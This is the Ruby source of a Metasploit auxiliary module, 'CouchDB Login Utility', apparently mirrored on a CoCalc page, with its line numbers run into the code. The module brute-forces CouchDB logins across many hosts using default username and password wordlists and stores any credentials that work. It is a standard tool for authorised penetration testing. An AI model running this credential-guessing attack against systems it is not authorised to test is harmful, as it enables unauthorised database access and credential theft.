CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/couchdb/couchdb_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::AuthBrute9include Msf::Auxiliary::Scanner1011def initialize(info={})12super(update_info(info,13'Name' => 'CouchDB Login Utility',14'Description' => %{15This module tests CouchDB logins on a range of16machines and report successful logins.17},18'Author' =>19[20'espreto <robertoespreto[at]gmail.com>'21],22'License' => MSF_LICENSE23))2425register_options(26[27Opt::RPORT(5984),28OptString.new('TARGETURI', [false, "TARGETURI for CouchDB. Default here is /", "/"]),29OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",30File.join(Msf::Config.data_directory, "wordlists", "http_default_userpass.txt") ]),31OptPath.new('USER_FILE', [ false, "File containing users, one per line",32File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),33OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",34File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),35OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),36])3738deregister_options('HttpUsername', 'HttpPassword')39end4041def run_host(ip)4243user = datastore['HttpUsername'].to_s44pass = datastore['HttpPassword'].to_s4546if user.nil? || user.strip == ''47each_user_pass do |user, pass|48do_login(user, pass)49end50return51end5253vprint_status("#{rhost}:#{rport} - Trying to login with '#{user}' : '#{pass}'")5455uri = target_uri.path5657res = send_request_cgi({58'uri' => normalize_uri(uri, '_users/_all_docs'),59'method' => 'GET',60'authorization' => basic_auth(user, pass)61})6263return if res.nil?64return if (res.headers['Server'].nil? or res.headers['Server'] !~ /CouchDB/)65return if (res.code == 404)6667if [200, 301, 302].include?(res.code)68vprint_good("#{rhost}:#{rport} - Successful login with '#{user}' : '#{pass}'")69end7071rescue ::Rex::ConnectionError72vprint_error("'#{rhost}':'#{rport}' - Failed to connect to the web server")73end7475def report_cred(opts)76service_data = {77address: opts[:ip],78port: opts[:port],79service_name: opts[:service_name],80protocol: 'tcp',81workspace_id: myworkspace_id82}8384credential_data = {85origin_type: :service,86module_fullname: fullname,87username: opts[:user],88private_data: opts[:password],89private_type: :password90}.merge(service_data)9192login_data = {93core: create_credential(credential_data),94status: Metasploit::Model::Login::Status::UNTRIED,95proof: opts[:proof]96}.merge(service_data)9798create_credential_login(login_data)99end100101def do_login(user, pass)102vprint_status("Trying username:'#{user}' with password:'#{pass}'")103104res = send_request_cgi({105'uri' => normalize_uri(target_uri.path, '_users/_all_docs'),106'method' => 'GET',107'ctype' => 'text/plain',108'authorization' => basic_auth(user, pass)109})110111unless res112print_error('HTTP connection failed, aborting')113return :abort114end115116return :skip_pass unless res.code == 200117118print_good("#{peer} - Successful login with: '#{user}' : '#{pass}'")119120report_cred(121ip: rhost,122port: rport,123service_name: 'couchdb',124user: user,125password: pass,126proof: res.code.to_s127)128129:next_user130rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT131print_error('HTTP connection failed, aborting')132return :abort133rescue => e134print_error("Error: #{e}")135return nil136end137end138139140